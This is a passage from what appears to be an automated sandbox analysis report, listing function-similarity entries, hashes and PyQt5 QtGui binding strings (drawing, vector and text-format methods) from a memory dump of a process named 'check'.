                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?contains@Bool_F@@@FromLongPainterPath@@$PointRect
                                                                                                                                                                                                                • String ID: BJ1$BJ9$QPainterPath$contains$contains(self, pt: Union[QPointF, QPoint]) -> boolcontains(self, rect: QRectF) -> boolcontains(self, p: QPainterPath) -> bool
                                                                                                                                                                                                                • API String ID: 4104991098-2786663850
                                                                                                                                                                                                                • Opcode ID: bff1b2ebbd895d98924435a103a4323318d803a81499cab347a24f1b90d8876e
                                                                                                                                                                                                                • Instruction ID: 403fc15b29b5eee1c4aae243e1c331973bf6ac3205739b58b66cc8cac973d5ef
                                                                                                                                                                                                                • Opcode Fuzzy Hash: bff1b2ebbd895d98924435a103a4323318d803a81499cab347a24f1b90d8876e
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9D5118B6A08F4599EB608F71E8840E937B8FB48B98B544576DE8D43768DF3CD198C710

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Array@@BytePoint@@@@Vector@$??0?$?begin@?$?receivers@FromLongLong_Object@@Point@@
                                                                                                                                                                                                                • String ID: BP0$QTextList$pyqt5_get_signal_signature$receivers$receivers(self, signal: PYQT_SIGNAL) -> int
                                                                                                                                                                                                                • API String ID: 842024227-2161664726
                                                                                                                                                                                                                • Opcode ID: 62e87c71fcdf17e0a174dca32a9e45d95a5d82fbba875d599316169cc519c955
                                                                                                                                                                                                                • Instruction ID: 5a75b3451cb093d4d072ca498ad671e86f6cfdd8ad62602bcd71153ea8f324f8
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 62e87c71fcdf17e0a174dca32a9e45d95a5d82fbba875d599316169cc519c955
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 84310AB5A1CA46C2EB208F35E8890B933A9FB95B85F6041B6CA4D43370DF3CD949C700

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: From$DeallocDoubleFloat_$FormatUnicode_
                                                                                                                                                                                                                • String ID: PyQt5.QtGui.QVector4D(%R, %R, %R, %R)
                                                                                                                                                                                                                • API String ID: 3465742751-4060293262
                                                                                                                                                                                                                • Opcode ID: e04101e1c1e824ba33082aafffd6755d9bd09ff449eeb7073204de4622d2a1d5
                                                                                                                                                                                                                • Instruction ID: a4ee7557d779b2df82480f33c66735f47bee4d49ff9c8d472faed67e685be04e
                                                                                                                                                                                                                • Opcode Fuzzy Hash: e04101e1c1e824ba33082aafffd6755d9bd09ff449eeb7073204de4622d2a1d5
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D93184B1A0DB6686EB758F31E514128B3A8AF46FA1F084174CE4D27B54EF3CE4859700

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?distanceDoubleFloat_FromPlane@Vector3$V1@00@V1@0@
                                                                                                                                                                                                                • String ID: BJ9J9$BJ9J9J9$QVector3D$distanceToPlane$distanceToPlane(self, plane: QVector3D, normal: QVector3D) -> floatdistanceToPlane(self, plane1: QVector3D, plane2: QVector3D, plane3: QVector3D) -> float
                                                                                                                                                                                                                • API String ID: 1747374115-3970635311
                                                                                                                                                                                                                • Opcode ID: c01807fab20fe83314067407c99e9df8a108f9269838532c668955ea757f3078
                                                                                                                                                                                                                • Instruction ID: 678115f1bf9e07bd4153861f578fa90d677b57eeb13b104bc3c05ce3b9566072
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c01807fab20fe83314067407c99e9df8a108f9269838532c668955ea757f3078
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2B4145B6608F8685DB60CF21F4883AA77A8FB99780F504276DA8D43724DF3CD599CB40
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?map@Transform@@V2@@$Concurrency::cancel_current_taskDeallocLineLine@@PointPoint@@malloc
                                                                                                                                                                                                                • String ID: J1J9$J9J9
                                                                                                                                                                                                                • API String ID: 195627164-2568843907
                                                                                                                                                                                                                • Opcode ID: 36a2918275401c536ff13508c2a07f66cab95c845ef2f1bfb27fb68f89e8c33c
                                                                                                                                                                                                                • Instruction ID: 88d54c74e3543035e631deeaf8e3cbd111df7fce3b6d43c762f8bf8ea8706fe5
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 36a2918275401c536ff13508c2a07f66cab95c845ef2f1bfb27fb68f89e8c33c
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 39F1A0B2A09B4989E7618F36E4442A833A8FF5AB84F158776EE0D67761DF3CE044D710
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • ?drawRoundedRect@QPainter@@QEAAXAEBVQRectF@@NNW4SizeMode@Qt@@@Z.QT5GUI ref: 00007FFB9A357A5C
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • BJ9dd|E, xrefs: 00007FFB9A3579B8
                                                                                                                                                                                                                • Biiiidd|E, xrefs: 00007FFB9A357AF8
                                                                                                                                                                                                                • drawRoundedRect(self, rect: QRectF, xRadius: float, yRadius: float, mode: Qt.SizeMode = Qt.AbsoluteSize)drawRoundedRect(self, x: int, y: int, w: int, h: int, xRadius: float, yRadius: float, mode: Qt.SizeMode = Qt.AbsoluteSize)drawRoundedRect(self, rect: QRec, xrefs: 00007FFB9A357C61
                                                                                                                                                                                                                • drawRoundedRect, xrefs: 00007FFB9A357C6C
                                                                                                                                                                                                                • QPainter, xrefs: 00007FFB9A357C73
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?drawMode@Painter@@Qt@@@RectRect@RoundedSize
                                                                                                                                                                                                                • String ID: BJ9dd|E$Biiiidd|E$QPainter$drawRoundedRect$drawRoundedRect(self, rect: QRectF, xRadius: float, yRadius: float, mode: Qt.SizeMode = Qt.AbsoluteSize)drawRoundedRect(self, x: int, y: int, w: int, h: int, xRadius: float, yRadius: float, mode: Qt.SizeMode = Qt.AbsoluteSize)drawRoundedRect(self, rect: QRec
                                                                                                                                                                                                                • API String ID: 271538415-1207344993
                                                                                                                                                                                                                • Opcode ID: 5c34b787637081d8024e1b30f00e5c249184803754bddaa6b187d2e0231aa1b2
                                                                                                                                                                                                                • Instruction ID: 1d9d186daa68af672ae20ec61d2a070e4c1b63ff800393580ca82a013a0880f7
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5c34b787637081d8024e1b30f00e5c249184803754bddaa6b187d2e0231aa1b2
                                                                                                                                                                                                                • Instruction Fuzzy Hash: E991D576A08F5599E721CF75E88019E77B8FB49798F100266EE8D23B28EF38D195C740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • ??0QTextDocumentWriter@@QEAA@XZ.QT5GUI ref: 00007FFB9A35DBE9
                                                                                                                                                                                                                • ??0QTextDocumentWriter@@QEAA@PEAVQIODevice@@AEBVQByteArray@@@Z.QT5GUI ref: 00007FFB9A35DC72
                                                                                                                                                                                                                  • Part of subcall function 00007FFB9A3F9D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB9A2D12CB), ref: 00007FFB9A3F9D32
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: DocumentTextWriter@@$Array@@@ByteDevice@@malloc
                                                                                                                                                                                                                • String ID: J1|J1$J8J1
                                                                                                                                                                                                                • API String ID: 3486399790-908227438
                                                                                                                                                                                                                • Opcode ID: 3ee34da659aeb34d85d177c757737551d9e371d8acdadaa9717a79a4a11ef541
                                                                                                                                                                                                                • Instruction ID: a02350db525cfe5075e2d53007a03cbe3330086501223d3d4ccb8d190c9f6032
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3ee34da659aeb34d85d177c757737551d9e371d8acdadaa9717a79a4a11ef541
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4351F6B6B18B4189FB608B66E8402A937B8FB49B88F10457ADE8D53B68DF3CD144C750
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • ?setFormat@QSyntaxHighlighter@@IEAAXHHAEBVQTextCharFormat@@@Z.QT5GUI ref: 00007FFB9A319BF6
                                                                                                                                                                                                                • ?setFormat@QSyntaxHighlighter@@IEAAXHHAEBVQColor@@@Z.QT5GUI ref: 00007FFB9A319C9C
                                                                                                                                                                                                                • ?setFormat@QSyntaxHighlighter@@IEAAXHHAEBVQFont@@@Z.QT5GUI ref: 00007FFB9A319D31
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?setFormat@Highlighter@@Syntax$CharColor@@@Font@@@Format@@@Text
                                                                                                                                                                                                                • String ID: BiiJ1$BiiJ9$QSyntaxHighlighter$setFormat$setFormat(self, start: int, count: int, format: QTextCharFormat)setFormat(self, start: int, count: int, color: Union[QColor, Qt.GlobalColor])setFormat(self, start: int, count: int, font: QFont)
                                                                                                                                                                                                                • API String ID: 1787067796-2653964744
                                                                                                                                                                                                                • Opcode ID: 1bf213333af16b4cc60e7c214b236e661136d5e9e35e064c5a442c5af3d30c6f
